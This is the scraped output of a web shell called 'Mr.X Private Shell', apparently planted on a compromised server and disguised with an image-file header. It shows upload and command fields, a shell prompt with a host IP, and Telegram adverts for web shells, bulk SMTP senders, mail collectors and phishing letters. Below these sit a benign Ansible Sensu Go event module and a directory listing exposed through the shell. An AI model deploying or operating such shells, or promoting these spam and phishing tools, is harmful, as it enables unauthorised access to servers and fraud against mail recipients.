����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Paul Arthur <paul.arthur@flowerysong.com>
# Copyright: (c) 2019, XLAB Steampunk <steampunk@xlab.si>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type

ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["stableinterface"],
    "supported_by": "certified",
}

DOCUMENTATION = '''
module: event
author:
  - Paul Arthur (@flowerysong)
  - Aljaz Kosir (@aljazkosir)
  - Manca Bizjak (@mancabizjak)
  - Tadej Borovsak (@tadeboro)
short_description: Manage Sensu events
description:
  - Send a synthetic event to Sensu.
  - For more information, refer to the Sensu documentation at
    U(https://docs.sensu.io/sensu-go/latest/reference/events/).
version_added: 1.0.0
extends_documentation_fragment:
  - sensu.sensu_go.requirements
  - sensu.sensu_go.auth
  - sensu.sensu_go.namespace
seealso:
  - module: sensu.sensu_go.event_info
notes:
  - Metric events bypass the store and are sent off to the event pipeline and corresponding event
    handlers. Read more about this at
    U(https://docs.sensu.io/sensu-go/latest/reference/events/#metric-only-events).
options:
  timestamp:
    description:
      - UNIX time at which the event occurred.
    type: int
  entity:
    description:
      - Name of the entity associated with this event. It must exist before event creation.
    type: str
    required: true
  check:
    description:
      - Name of the check associated with this event. It must exist before event creation.
    type: str
    required: true
  check_attributes:
    type: dict
    description:
      - Additional check parameters. Find out more at
        U(https://docs.sensu.io/sensu-go/latest/reference/events/#check-attributes).
    suboptions:
      duration:
        description:
          - Command execution time in seconds.
        type: float
      executed:
        description:
          - Time that the check request was executed.
        type: int
      history:
        description:
          - Check status history for the last 21 check executions.
        type: list
        elements: dict
      issued:
        description:
          - Time that the check request was issued in seconds since the Unix epoch.
        type: int
      last_ok:
        description:
          - The last time that the check returned an OK status (0) in seconds since the Unix epoch.
        type: int
      output:
        description:
          - The output from the execution of the check command.
        type: str
      state:
        description:
          - The state of the check.
        choices: [ "passing", "failing", "flapping" ]
        type: str
      status:
        description:
          - Exit status code produced by the check.
        choices: [ "ok", "warning", "critical", "unknown" ]
        type: str
      total_state_change:
        description:
          - The total state change percentage for the check's history.
        type: int
  metric_attributes:
    type: dict
    description:
      - Metric attributes. Find out more at
        U(https://docs.sensu.io/sensu-go/latest/reference/events/#metric-attributes).
    suboptions:
      handlers:
        description:
          - An array of Sensu handlers to use for events created by the check.
            Each array item must be a string.
        type: list
        elements: str
      points:
        description:
          - Metric data points including a name, timestamp, value, and tags.
        type: list
        elements: dict
'''

EXAMPLES = '''
- name: Create an event
  sensu.sensu_go.event:
    auth:
      url: http://localhost:8080
    entity: awesome_entity
    check: awesome_check
    check_attributes:
      duration: 1.945
      executed: 1522100915
      history:
        - executed: 1552505193
          status: 1
      issued: 1552506034
      last_ok: 1552506033
      output: '10'
      state: 'passing'
      status: 'ok'
      total_state_change: 0
    metric_attributes:
      handlers:
        - handler1
        - handler2
      points:
        - name: "sensu-go-sandbox.curl_timings.time_total"
          tags:
            - name: "response_time_in_ms"
              value: 101
          timestamp: 1552506033
          value: 0.005
        - name: "sensu-go-sandbox.curl_timings.time_namelookup"
          tags:
            - name: "namelookup_time_in_ms"
              value: 57
          timestamp: 1552506033
          value: 0.004
'''

RETURN = '''
object:
  description: Object representing Sensu event (deprecated).
  returned: success
  type: dict
  sample:
    metadata:
      namespace: default
    check:
      check_hooks: null
      command: check-cpu.sh -w 75 -c 90
      duration: 1.07055808
      env_vars: null
      executed: 1552594757
      handlers: []
      high_flap_threshold: 0
      history:
      - executed: 1552594757
        status: 0
      interval: 60
      metadata:
        name: check-cpu
        namespace: default
      occurrences: 1
      occurrences_watermark: 1
      output: CPU OK - Usage:3.96
      subscriptions:
        - linux
      timeout: 0
      total_state_change: 0
      ttl: 0
    entity:
      deregister: false
      deregistration: {}
      entity_class: agent
      last_seen: 1552594641
      metadata:
        name: sensu-centos
        namespace: default
    timestamp: 1552594758
    id: 3a5948f3-6ffd-4ea2-a41e-334f4a72ca2f
    sequence: 1
'''

from ansible.module_utils.basic import AnsibleModule

from ..module_utils import arguments, errors, utils

STATUS_MAP = {
    'ok': 0,
    'warning': 1,
    'critical': 2,
    'unknown': 3,
}


def get_check(client, namespace, check):
    check_path = utils.build_core_v2_path(namespace, 'checks', check)
    resp = client.get(check_path)
    if resp.status != 200:
        raise errors.SyncError("Check with name '{0}' does not exist on remote.".format(check))
    return resp.json


def get_entity(client, namespace, entity):
    entity_path = utils.build_core_v2_path(namespace, 'entities', entity)
    resp = client.get(entity_path)
    if resp.status != 200:
        raise errors.SyncError("Entity with name '{0}' does not exist on remote.".format(entity))
    return resp.json


def _update_payload_with_metric_attributes(payload, metric_attributes):
    if not metric_attributes:
        return

    payload['metrics'] = arguments.get_spec_payload(metric_attributes, *metric_attributes.keys())


def _update_payload_with_check_attributes(payload, check_attributes):
    if not check_attributes:
        return

    if check_attributes['status']:
        check_attributes['status'] = STATUS_MAP[check_attributes['status']]

    filtered_attributes = arguments.get_spec_payload(check_attributes, *check_attributes.keys())
    payload['check'].update(filtered_attributes)


def _build_api_payload(client, params):
    payload = arguments.get_spec_payload(params, 'timestamp')
    payload['metadata'] = dict(
        namespace=params['namespace']
    )
    payload['entity'] = get_entity(client, params['namespace'], params['entity'])
    payload['check'] = get_check(client, params['namespace'], params['check'])

    _update_payload_with_check_attributes(payload, params['check_attributes'])
    _update_payload_with_metric_attributes(payload, params['metric_attributes'])
    return payload


def send_event(client, path, payload, check_mode):
    if not check_mode:
        utils.put(client, path, payload)
    return True, payload


def main():
    module = AnsibleModule(
        supports_check_mode=True,
        argument_spec=dict(
            arguments.get_spec("auth", "namespace"),
            timestamp=dict(type='int'),
            entity=dict(required=True),
            check=dict(required=True),
            check_attributes=dict(
                type='dict',
                options=dict(
                    duration=dict(
                        type='float'
                    ),
                    executed=dict(
                        type='int'
                    ),
                    history=dict(
                        type='list', elements='dict',
                    ),
                    issued=dict(
                        type='int'
                    ),
                    last_ok=dict(
                        type='int'
                    ),
                    output=dict(),
                    state=dict(
                        choices=['passing', 'failing', 'flapping']
                    ),
                    status=dict(
                        choices=['ok', 'warning', 'critical', 'unknown']
                    ),
                    total_state_change=dict(
                        type='int'
                    )
                )
            ),
            metric_attributes=dict(
                type='dict',
                options=dict(
                    handlers=dict(
                        type='list',
                        elements='str'
                    ),
                    points=dict(
                        type='list',
                        elements='dict'
                    )
                )
            )
        )
    )

    client = arguments.get_sensu_client(module.params['auth'])
    path = utils.build_core_v2_path(
        module.params['namespace'], 'events', module.params['entity'],
        module.params['check'],
    )

    try:
        payload = _build_api_payload(client, module.params)
        changed, event = send_event(client, path, payload, module.check_mode)
        module.exit_json(changed=changed, object=event)
    except errors.Error as e:
        module.fail_json(msg=str(e))


if __name__ == '__main__':
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
ad_auth_provider.py File 11.83 KB 0644
asset.py File 6.08 KB 0644
asset_info.py File 2.43 KB 0644
auth_provider_info.py File 3.51 KB 0644
bonsai_asset.py File 3.48 KB 0644
check.py File 12.24 KB 0644
check_info.py File 2.29 KB 0644
cluster.py File 2.89 KB 0644
cluster_info.py File 2.49 KB 0644
cluster_role.py File 4.31 KB 0644
cluster_role_binding.py File 3.95 KB 0644
cluster_role_binding_info.py File 2.4 KB 0644
cluster_role_info.py File 2.31 KB 0644
datastore.py File 4.87 KB 0644
datastore_info.py File 2.59 KB 0644
entity.py File 7.29 KB 0644
entity_info.py File 3.04 KB 0644
etcd_replicator.py File 6.51 KB 0644
etcd_replicator_info.py File 2.71 KB 0644
event.py File 9.54 KB 0644
event_info.py File 3.44 KB 0644
filter.py File 4.17 KB 0644
filter_info.py File 2.26 KB 0644
handler_info.py File 2.27 KB 0644
handler_set.py File 2.95 KB 0644
hook.py File 3.69 KB 0644
hook_info.py File 2.27 KB 0644
ldap_auth_provider.py File 11.07 KB 0644
mutator.py File 3.98 KB 0644
mutator_info.py File 2.33 KB 0644
namespace.py File 2.17 KB 0644
namespace_info.py File 1.92 KB 0644
oidc_auth_provider.py File 6.28 KB 0644
pipe_handler.py File 4.43 KB 0644
role.py File 4.27 KB 0644
role_binding.py File 4.73 KB 0644
role_binding_info.py File 2.37 KB 0644
role_info.py File 2.33 KB 0644
secret.py File 3.34 KB 0644
secret_info.py File 2.77 KB 0644
secrets_provider_env.py File 2.49 KB 0644
secrets_provider_info.py File 2.85 KB 0644
secrets_provider_vault.py File 7.06 KB 0644
silence.py File 4.98 KB 0644
silence_info.py File 2.93 KB 0644
socket_handler.py File 3.97 KB 0644
tessen.py File 2.66 KB 0644
user.py File 10.21 KB 0644
user_info.py File 2.19 KB 0644